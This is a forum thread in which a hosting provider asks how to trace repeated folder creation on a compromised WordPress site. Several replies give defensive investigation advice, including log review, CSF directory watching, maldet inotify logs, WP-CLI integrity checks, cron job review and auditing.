how to find out who is creating folders?
Hello Community.
Hope everybody is doing good.
We are currently struggling with one of the customers account that is being hacked on a daily basis now. That drives us crazy.
the customer is using a WordPress CMS and there are few content managers from India that are using it to update content on daily basis.
a week ago the customer has reported a Google Ads has blocked his campaign for numbers of malware virus complaints .
After we have made a scan, we have located many folders and files that have no relation to WordPress.
-
Hey there! You mention that you are resetting the password for a user. Have you performed a virus scan on the user's machine(s) with access to that cPanel account? It's possible there could be keylogger software installed that is stealing the password and then using it to log in. 0 -
You can take the following actions to deal with the situation: To determine who creates folders on the website, you can check the website's server logs. The server logs will contain information about when and where the folders were created. Once you have access to the logs, look for entries corresponding to when the folders were created. The logs will show the IP address and other identifying information of the user who created the folders. In cases where the server logs do not provide enough information, you may need to look for other clues to determine who is creating the folders. Some steps you can take include: - Look for accounts with administrative access or accounts that were created recently.
- Review file permissions
- Set up alerts or notifications for any changes to the website or files
- Limit access to the website from specific IP addresses or regions.
0 -
Bit of an old thread but having faced this myself I can recommend the following. We are running, amongst other things, CSF and maldet. With CSF we monitor troublesome sites with csf.dirwatch so that email alerts go out when directories change. With maldet, you can then xref inotify_log for the same time frame to see what other files are being created/modified and in what order. You can then xref these timestamps with Apache/FTP/cPanel access logs. Most of the time, we find password compromise is the culprit for these mystery infections as simple things like shells being POST'd to are easy to catch by simply grep'ing logs. 0 -
Hello, Yes, monitoring the folder will get details about the file/directory changes. Carefully analyze the logs and identify the exact way the files were created. Whether it is using ftp/login or using some scripts or not. - check all the existing plugins and remove unwanted plugins from Wordpress. - Go through the file manager for the file names, an experienced server administrator can easily detect the files, if they are using unusual file names, which may not be detected by normal users. - Find the recently modified files from plugins, themes folder, etc., and identify the modified files. - Use Wpcli tools to check the integrity of the Wordpress files. - Analyse the logs for POST requests and manually check those files were genuine or not. - Do a scan, but we cannot confirm that the scan will detect all the files.. Overall, multiple areas need to check and monitor the account for multiple days to identify the infection and clear it. 0 -
A few other things. - Check for cron jobs. We have seen a number of compromises that install cPanel account cron jobs that download/reinfect the site
- If you have root access, learn how to use built in auditing. Turning on auditing for the users public_html folder will help you determine how files/folders are getting created.
0
Please sign in to leave a comment.
Comments
5 comments